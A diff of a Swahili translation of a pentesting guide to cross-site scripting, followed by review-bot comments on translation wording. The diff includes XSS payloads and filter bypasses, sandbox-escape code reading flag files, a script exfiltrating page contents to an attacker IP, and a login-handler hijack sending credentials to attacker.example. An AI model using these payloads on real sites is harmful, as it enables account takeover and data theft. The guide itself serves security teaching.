Kwa hili unaweza kutumia cookie tossing attack: {{#ref}} ../hacking-with-cookies/cookie-tossing.md {{#endref}} -You can find a great abuse of this technique in [**this blog post**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html). +Unaweza kupata matumizi makubwa ya mbinu hii katika [**chapisho hili la blogu**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html). -### Sending your session to the admin +### Kutuma session yako kwa admin -Labda mtumiaji anaweza kushiriki wasifu wake na admin, na ikiwa self XSS iko ndani ya wasifu wa mtumiaji na admin anaiangalia, ataichochea udhaifu huo. +Huenda mtumiaji anaweza kushiriki profile yake na admin, na ikiwa self XSS iko ndani ya profile ya mtumiaji na admin ataifikia, atasababisha udhaifu huo. -### Session Mirroring +### Kuakisi kikao -Ikiwa unapata self XSS na ukurasa wa wavuti una **session mirroring for administrators**, kwa mfano kuruhusu wateja kuomba msaada ili admin akupe msaada atakuwa anaona kile unachoona katika session yako lakini kutoka session yake. +Ikiwa unatambua self XSS na ukurasa wa wavuti una **session mirroring kwa administrators**, kwa mfano kuruhusu wateja kuomba msaada na ili admin akupe msaada atakuwa akiangalia kile unachoona katika session yako lakini kwa session yake. -Unaweza kumfanya **administrator trigger your self XSS** na kumpora cookies/session yake. +Unaweza kufanya **msimamizi asababisha self XSS yako** na kuiba cookies/session zake. + +## Njia nyingine za kupita + +### Kupita sanitization kupitia WASM linear-memory template overwrite + +Wakati web app inapotumia Emscripten/WASM, constant strings (kama HTML format stubs) zinaishi kwenye writable linear memory. Overflow moja ndani ya WASM (mfano, memcpy isiyochunguzwa kwenye njia ya uhariri) inaweza kuharibu miundo jirani na kuelekeza maandishi kwenye constant hizo. Kuandika upya template kama "

%.*s

" hadi "" kunageuza input iliyosanitiwa kuwa thamani ya handler ya JavaScript na kusababisha DOM XSS mara moja wakati wa render. + +Angalia ukurasa maalum wenye mtiririko wa exploitation, DevTools memory helpers, na mbinu za ulinzi: + +{{#ref}} +wasm-linear-memory-template-overwrite-xss.md +{{#endref}} -## Other Bypasses ### Normalised Unicode -Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** kwenye server (au upande wa client) na kutumia kazi hii kuingia kando ya ulinzi. [**Find an example here**](../unicode-injection/index.html#xss-cross-site-scripting). +Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** upande wa server (au upande wa client) na kutumia vibaya utendakazi huu kupita ulinzi. [**Pata mfano hapa**](../unicode-injection/index.html#xss-cross-site-scripting). ### PHP FILTER_VALIDATE_EMAIL flag Bypass ```javascript @@ -824,16 +832,16 @@ Unaweza kuangalia kama **reflected values** zinafanyiwa **unicode normalized** k ``` ### Ruby-On-Rails bypass -Kutokana na **RoR mass assignment** nukuu zinaingizwa ndani ya HTML na kisha kikomo cha nukuu kinavunjwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\ +Kutokana na **RoR mass assignment** alama za nukuu zinaingizwa kwenye HTML, na hivyo kikomo cha nukuu kinaweza kupitishwa na mashamba ya ziada (onfocus) yanaweza kuongezwa ndani ya tag.\ Mfano wa fomu ([from this report](https://hackerone.com/reports/709336)), ikiwa utatuma payload: ``` contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa ``` -Jozi "Key","Value" itarudishwa kama hii: +Jozi "Key","Value" itarudishwa kama ifuatavyo: ``` {" onfocus=javascript:alert('xss') autofocus a"=>"a"} ``` -Kisha, onfocus attribute itaingizwa na XSS itatokea. +Kisha, attribute onfocus itaingizwa na XSS itatokee. ### Mchanganyiko maalum ```html 
@@ -865,24 +873,24 @@ Kisha, onfocus attribute itaingizwa na XSS itatokea. window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) document['default'+'View'][`\u0061lert`](3) ``` -### XSS na injection ya header katika response ya 302 +### XSS with header injection in a 302 response -Ukipata kuwa unaweza **kuingiza headers katika 302 Redirect response** unaweza kujaribu **kumfanya browser itekeleze arbitrary JavaScript**. Hii si rahisi kwani browsers za kisasa hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo payload ya cross-site scripting pekee haitakuwa na faida. +Ikiwa ugundua kuwa unaweza **inject headers in a 302 Redirect response** unaweza kujaribu **make the browser execute arbitrary JavaScript**. Hii si rahisi kama ilivyo kawaida kwa sababu modern browsers hazitafsiri HTTP response body ikiwa HTTP response status code ni 302, hivyo just a cross-site scripting payload haifai. -Katika [**this report**](https://www.gremwell.com/firefox-xss-302) na [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi unavyoweza kujaribu protocols kadhaa ndani ya Location header na kuona ikiwa yoyote yao inaruhusu browser kukagua na kutekeleza payload ya XSS ndani ya body.\ +In [**this report**](https://www.gremwell.com/firefox-xss-302) and [**this one**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) unaweza kusoma jinsi ya kujaribu protokoli kadhaa ndani ya Location header na kuona kama yoyote yao inaruhusu browser kuchunguza na execute XSS payload ndani ya body.\ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location header_, `resource://`. -### Herufi, Nambari na Nukta Pekee +### Herufi Pekee, Nambari na Nukta -Ikiwa unaweza kubainisha **callback** ambayo javascript itakayokuwa **itekelezwe** ikiwa imepunguzwa kwa herufi, nambari na nukta tu. [**Read this section of this post**](#javascript-function) ili kujifunza jinsi ya kuudanganya tabia hii. 
+If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](#javascript-function) to find how to abuse this behaviour. -### Valid ` ``` Jibu ni: -- **module** (default, hakuna cha kuelezea) -- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele kinachokuwezesha kukusanya data nyingi (HTML, CSS, JS…) pamoja ndani ya faili la **`.wbn`**. +- **module** (chaguo-msingi, hakuna cha kufafanua) +- [**webbundle**](https://web.dev/web-bundles/): Web Bundles ni kipengele kinachokuruhusu kuweka pamoja data nyingi (HTML, CSS, JS…) katika faili ya **`.wbn`**. ```html The resources are loaded from the source .wbn, not accessed via HTTP ``` -- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha sintaksi ya import +- [**importmap**](https://github.com/WICG/import-maps)**:** Inaruhusu kuboresha import syntax ```html ``` -Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) kurekebisha maktaba ili kutumia eval; kuitumia vibaya kunaweza kusababisha XSS. +Tabia hii ilitumika katika [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) kuremapa laibrari kwa eval ili kuitumia vibaya — inaweza kusababisha XSS. -- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kimekusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi kama ifuatavyo: +- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Kipengele hiki hasa kilikusudiwa kutatua baadhi ya matatizo yanayosababishwa na pre-rendering. Kinafanya kazi hivi: ```html ``` -### Web Content-Types kwa XSS +### Content-Types za Web kwa XSS (Kutoka [**here**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Aina zifuatazo za Content-Types zinaweza kutekeleza XSS katika browsers zote: 
@@ -967,15 +975,15 @@ Tabia hii ilitumiwa katika [**this writeup**](https://github.com/zwade/yaca/tree - application/xml - text/xml - image/svg+xml -- text/plain (?? not in the list but I think I saw this in a CTF) +- text/plain (?? haipo kwenye orodha lakini nadhani niliona hii kwenye CTF) - application/rss+xml (off) - application/atom+xml (off) -Katika browsers nyingine, **`Content-Types`** nyingine zinaweza kutumika kutekeleza arbitrary JS, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md) +Katika browsers nyingine, aina nyingine za **`Content-Types`** zinaweza kutumika kuendesha JS yoyote, angalia: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md) ### xml Content Type -Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace na kutekeleza arbitrary JS: +Kama ukurasa unarudisha text/xml content-type, inawezekana kuonyesha namespace na kuendesha JS yoyote: ```xml hello 
@@ -987,9 +995,9 @@ Ikiwa ukurasa unarudisha content-type text/xml, inawezekana kuonyesha namespace Wakati kitu kama **`"some {{template}} data".replace("{{template}}", )`** kinapotumika. Mshambuliaji anaweza kutumia [**special string replacements**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#specifying_a_string_as_the_replacement) kujaribu kuvuka baadhi ya kinga: `` "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"})) `` -Kwa mfano katika [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hili lilitumika ku-escape string ya JSON ndani ya script na kutekeleza code yoyote. +Kwa mfano katika [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), hili lilitumika kwa **ku-escape JSON string** ndani ya script na kutekeleza arbitrary code. -### Cache ya Chrome kwa XSS +### Chrome Cache to XSS {{#ref}} @@ -998,7 +1006,7 @@ chrome-cache-to-xss.md ### XS Jails Escape -Ikiwa una idadi ndogo tu ya characters za kutumia, angalia suluhisho hizi nyingine zinazofaa kwa matatizo ya XSJail: +Ikiwa una seti ndogo tu ya chars za kutumia, angalia suluhisho hizi nyingine sahihi kwa matatizo ya XSJail: ```javascript // eval + unescape + regex eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))() 
@@ -1029,22 +1037,22 @@ constructor(source)() // For more uses of with go to challenge misc/CaaSio PSE in // https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE ``` -Ikiwa **everything is undefined** kabla ya kutekeleza untrusted code (kama katika [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)) inawezekana kuunda vitu vinavyofaa "out of nothing" ili kutumia vibaya utekelezaji wa arbitrary untrusted code: +Iwapo **everything is undefined** kabla ya kuendesha untrusted code (kama katika [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)), inawezekana kuunda vitu muhimu "out of nothing" ili kuabusu execution ya arbitrary untrusted code: - Using import() ```javascript // although import "fs" doesn’t work, import('fs') does. import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8"))) ``` -- Kufikia `require` kwa njia isiyo ya moja kwa moja +- Kupata `require` kwa njia isiyo ya moja kwa moja -[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules hufunikwa na Node.js ndani ya function, kama ifuatavyo: +[Kulingana na hii](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) moduli zimefungwa na Node.js ndani ya function, kama ifuatavyo: ```javascript ;(function (exports, require, module, __filename, __dirname) { // our actual module code }) ``` -Kwa hivyo, ikiwa kutoka kwenye module hiyo tunaweza **kuitisha function nyingine**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka kwenye function hiyo kupata **`require`**: +Hivyo, ikiwa kutoka module hiyo tunaweza **call another function**, inawezekana kutumia `arguments.callee.caller.arguments[1]` kutoka function hiyo kufikia **`require`**: ```javascript 
;(function () { return arguments.callee.caller.arguments[1]("fs").readFileSync( @@ -1053,7 +1061,7 @@ return arguments.callee.caller.arguments[1]("fs").readFileSync( ) })() ``` -Kwa njia inayofanana na mfano uliopita, inawezekana **use error handlers** kufikia **wrapper** ya module na kupata **`require`** function: +Kwa njia sawa na mfano uliopita, inawezekana **use error handlers** kufikia **wrapper** ya module na kupata **`require`** function: ```javascript try { null.f() @@ -1093,12 +1101,12 @@ trigger() ``` ### Obfuscation & Advanced Bypass -- **Obfuscations tofauti katika ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) +- **Different obfuscations kwenye ukurasa mmoja:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) - [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js) - [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com) - [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/) - [http://www.jsfuck.com/](http://www.jsfuck.com) -- Mbinu za JSFuck zilizo ngumu zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) +- JSFuck ya hali ya juu zaidi: [https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce) - [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html) - [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html) - [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses) 
@@ -1274,7 +1282,7 @@ o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o] ``` ## XSS payloads za kawaida -### Payloads kadhaa katika 1 +### Payloads kadhaa ndani ya 1 {{#ref}} @@ -1283,7 +1291,7 @@ steal-info-js.md ### Iframe Trap -Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vitendo vyake (ikiwa ni pamoja na taarifa zilizotumwa kwenye fomu): +Mfanye mtumiaji avinjari kwenye ukurasa bila kutoka kwenye iframe na uibe vitendo vyake (ikijumuisha taarifa zilizotumwa kwenye fomu): {{#ref}} @@ -1313,9 +1321,9 @@ Lazimisha mtumiaji avinjari kwenye ukurasa bila kutoka katika iframe na uibe vit ``` > [!TIP] -> Hutaweza **kufikia cookies kutoka JavaScript** ikiwa bendera ya HTTPOnly imewekwa kwenye cookie. Lakini hapa kuna [njia kadhaa za kuzunguka ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa utakuwa na bahati. +> Hutaweza **kupata cookies kutoka kwa JavaScript** ikiwa flag ya HTTPOnly imewekwa kwenye cookie. Lakini hapa una [njia kadhaa za kuipita ulinzi huu](../hacking-with-cookies/index.html#httponly) ikiwa una bahati. -### Kuiba Yaliyomo ya Ukurasa +### Kunyakua Maudhui ya Ukurasa ```javascript var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8" var attacker = "http://10.10.14.8/exfil" @@ -1328,7 +1336,7 @@ fetch(attacker + "?" + encodeURI(btoa(xhr.responseText))) xhr.open("GET", url, true) xhr.send(null) ``` -### Pata anwani za IP za ndani +### Tafuta IPs za ndani ```html ``` 
@@ -1427,7 +1435,7 @@ When any data is introduced in the password field, the username and password is ### Hijack form handlers to exfiltrate credentials (const shadowing) -Ikiwa handler muhimu (mfano, `function DoLogin(){...}`) inatangazwa baadaye kwenye ukurasa, na payload yako inaendesha mapema (mfano, via an inline JS-in-JS sink), fafanua `const` yenye jina sawa kwanza ili kuzuia na kufunga handler. Taarifa za function zinazotangazwa baadaye haziwezi rebind jina la `const`, zikiacha hook yako ikiwa ndani ya udhibiti: +Iwapo handler muhimu (mfano, `function DoLogin(){...}`) itatangazwa baadaye kwenye ukurasa, na payload yako ikafanya kazi mapema (mfano, via an inline JS-in-JS sink), tengeneza `const` yenye jina lile kwanza ili kuchukua nafasi na kufunga handler. Matangazo ya function baadaye hayawezi rebind jina la `const`, na hivyo kuiacha hook yako ikidhibiti: ```javascript const DoLogin = () => { const pwd = Trim(FormInput.InputPassword.value); @@ -1435,19 +1443,19 @@ const user = Trim(FormInput.InputUtente.value); fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd)); }; ``` -Vidokezo +Notes - Hii inategemea mpangilio wa utekelezaji: injection yako lazima itekelezwe kabla ya tamko halali. -- Ikiwa payload yako imefungwa ndani ya `eval(...)`, bindings za `const/let` hazitakuwa globals. Tumia dynamic ` ``` -### Kuuibia ujumbe za PostMessage +### Kuiba ujumbe za PostMessage ```html
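Review bot: in the added "Kupita sanitization kupitia WASM linear-memory template overwrite" paragraph the two template strings reach the reader as empty quotes around a bare `%.*s` (`"` ... `%.*s` ... `"` hadi `""`), which is what a markdown renderer does with raw HTML tags placed in body text; wrap both templates in backticks so the tag text is displayed, otherwise the sentence explaining what the overwrite turns the template into cannot be read. Smaller point in the same region: the heading becomes "Kuakisi kikao" while the body still says "session mirroring"; pick one term and use it in both places.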
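Review bot: in the Ruby-On-Rails hunk, "+Kisha, attribute onfocus itaingizwa na XSS itatokee." changes the correct "itatokea" into the subjunctive "itatokee", which is ungrammatical in this sentence; keep "itatokea". In the same hunk "mashamba ya ziada (onfocus)" reads as agricultural fields; "sehemu za ziada" (or the English "fields") is the usual wording for form or attribute fields.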
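Review bot: the 302-redirect hunk moves already translated text back to English or into a mixed form: "### XSS na injection ya header katika response ya 302" becomes "### XSS with header injection in a 302 response", the body now reads "Ikiwa ugundua kuwa unaweza **inject headers in a 302 Redirect response** ... **make the browser execute arbitrary JavaScript**" ("Ikiwa ugundua" is also ungrammatical; "Ukigundua" fits), "In [**this report**] ... and [**this one**]" is left untranslated, and the Swahili sentence under "Herufi Pekee, Nambari na Nukta" is replaced by "If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars.", which drops the explicit list of permitted characters. Keep the "-" versions of these lines and only retouch wording. Further down in the same region, "kuremapa laibrari kwa eval ili kuitumia vibaya — inaweza kusababisha XSS" introduces an em-dash and a calque; the removed line "kurekebisha maktaba ili kutumia eval; kuitumia vibaya kunaweza kusababisha XSS" was clearer.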
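Review bot: "### Cache ya Chrome kwa XSS" is replaced by the English "### Chrome Cache to XSS"; keep the Swahili heading, since every neighbouring heading in this file is translated. In the following XS Jails hunk, "seti ndogo tu ya chars" leaves "chars" untranslated where the removed line had "characters"; "herufi" or "vibambo" reads cleanly.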
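Review bot: in the Obfuscation list, "- **Different obfuscations kwenye ukurasa mmoja:**" replaces the fully translated "Obfuscations tofauti katika ukurasa mmoja"; keep the "-" line.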
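Review bot: in the const-shadowing hunk, "Matangazo ya function baadaye hayawezi rebind jina la `const`" leaves "rebind" untranslated; "hayawezi kufunga upya jina la `const`" keeps the meaning in Swahili. In the hunk after it, "-Vidokezo" / "+Notes" reverts the translated label to English; keep "Vidokezo".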